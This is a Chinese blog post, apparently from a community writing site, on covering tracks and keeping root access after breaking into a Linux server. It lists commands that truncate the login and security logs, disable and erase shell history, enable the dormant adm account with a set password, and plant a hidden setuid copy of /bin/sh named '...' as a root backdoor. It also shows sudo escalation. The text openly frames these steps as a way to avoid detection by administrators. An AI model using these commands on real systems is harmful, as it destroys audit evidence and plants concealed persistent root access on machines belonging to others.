美文网首页
linux清理入侵日志和维持权限

linux清理入侵日志和维持权限

作者: q1ya | 来源:发表于2020-01-13 15:28 被阅读0次
清除日志

1、清除登录ssh登录日志、安全日志、last、lastb等

cat /dev/null > /var/log/wtmp
cat /dev/null > /var/log/btmp
cat /dev/null > /var/log/lastlog
cat /dev/null > /var/log/secure

2、history删除

set +o history (最前面有空格)

输入该命令后,在当前终端,之后输入的所有命令都不会被history记录(防止搞到一半被管理员断网,记录留下)

history -c

输入该命令之后,当前终端所有输过的命令不会被记录到history(一般这>个就够了)

rm -rf ~/.bash_history

删除history,意思之前管理员记录的history也没了,有的管理员有查看history的习惯,这条慎用

linux suid提权

前提:以root权限激活用户,并创建suid提权的后门
激活adm用户(linux自带很多无用用户,如adm)
usermod -s /bin/bash adm
echo "password"|passwd --stdin adm
suid提权,把sh复制重命名为...,放在其他文件夹,加s权限,重命名为...是为了不被发现,ls看不到,ls -la一般人也看不出
cp /bin/sh /usr/share/...
chmod a+s /usr/share/...
使用时以adm ssh登录,然后输入以下命令就是root权限了
./usr/share/... -p
经测试3.10.0可以完全root权限,有些版本权限会有问题

linux sudo提权

前提:linux /etc/sudoers文件有添加你普通用户的账号


在以普通用户test执行sudo bash
输入test用户的密码
同理sudo vim sudo sh也是可以的

相关文章

  • linux清理入侵日志和维持权限

    清除日志 1、清除登录ssh登录日志、安全日志、last、lastb等cat /dev/null > /var/l...

  • linux权限维持

    ssh软连接后门 SSH服务默认使用PAM进行身份验证 PAM是Linux系统中的一个独立API,它提供了各种验证...

  • docker 容器日志清理方案

    本文为转载,原文:docker 容器日志清理方案 docker容器日志清理方案 找出容器日志 在linux上,容器...

  • Linux:crontab要点整理(表达式,转义,权限管理,日志

    摘要:Linux,crontab整理crontab的使用,包括cron表达式,设置和删除任务,权限管理,查看日志 ...

  • linux日志清理

    由于ubuntu日志文件syslog 和 kern.log 时刻在增长,一会儿就使得根目录文件夹不够用了,需使用如...

  • Linux-权限维持小结

    suid后门(需要root权限): SUID是Linux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂...

  • Linux关于磁盘空间相关命令

    Linux主机需要定时清理日志文件腾出空间,但有时候清理完日志文件后发现硬盘空间还是爆满,这个时候就需要手动查找出...

  • Linux 文件普通权限

    一、文件权限10个字符对应类型和权限 二、Linux普通文件和Linux目录读、写、执行权限说明 标注:Linux...

  • 记一次简单易上手的内网渗透实战

    我们大部分渗透操作都是从外网开始的,如果要获得更多的机器权限和维持权限,就必须掌握内获得更多的机器权限和维持权限,...

  • 20170724 文件权限

    概要 linux文件权限linux文件特殊权限ACL 访问控制列表 一、linux文件权限 (一)linux文件属...

网友评论

      本文标题:linux清理入侵日志和维持权限

      本文链接:https://www.haomeiwen.com/subject/xyzgactx.html